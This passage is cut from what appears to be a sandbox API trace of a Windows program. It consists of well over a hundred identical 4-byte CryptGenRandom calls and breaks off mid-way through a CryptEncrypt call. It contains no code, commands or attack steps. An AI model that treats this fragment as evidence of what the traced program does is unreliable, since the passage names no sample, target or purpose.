pbBuffer=0x2d7e630) returned 1 [0166.893] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.893] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.893] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.893] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.893] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.893] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.893] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.893] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.893] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.893] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.893] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.893] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.893] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.893] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.893] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.893] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.893] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.893] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.893] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.893] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.893] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.893] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.893] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.893] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.893] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.893] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.893] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.893] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.893] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.893] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.893] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.893] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.893] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.893] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.893] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.893] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.893] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.893] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.893] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.893] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.893] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.893] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.894] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.894] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.894] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.894] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.894] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.894] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.894] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.894] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.894] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.894] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.894] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.894] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.894] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.894] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.894] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.894] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.894] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.894] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.894] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.894] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.894] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.894] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.894] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.894] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.894] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.894] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.894] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.894] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.894] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.894] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.894] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.894] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.894] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.894] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.894] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.894] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.894] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.894] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.894] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.894] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.894] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.894] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.894] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.894] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.894] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.894] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.894] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.894] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.894] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.894] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.894] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.895] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.895] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.895] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.895] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.895] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.895] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.895] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.895] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.895] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.895] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.895] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.895] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.895] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.895] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.895] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.895] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.895] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.895] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.895] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.895] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.895] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.895] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.895] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.895] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.895] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.895] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.895] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.895] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.895] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.895] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.895] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.895] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.895] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.895] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.895] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.895] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.895] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.895] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.895] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.895] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.895] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.895] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.895] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.895] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.895] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.895] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.895] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.895] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.895] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.895] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.895] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.895] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.896] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.896] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.896] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.896] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.896] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.896] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.896] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.896] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.896] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.896] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.896] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.896] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.896] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.896] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.896] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.896] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.896] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.896] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.896] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.896] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.896] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.896] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.896] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.896] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.896] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.896] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.896] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.896] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.896] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.896] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.896] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.896] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.896] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.896] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.896] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.896] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.896] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.896] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.896] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.896] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.896] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.896] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.896] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.896] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.896] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.896] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.896] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.896] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.896] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.896] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.896] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.897] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.897] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.897] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.897] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, 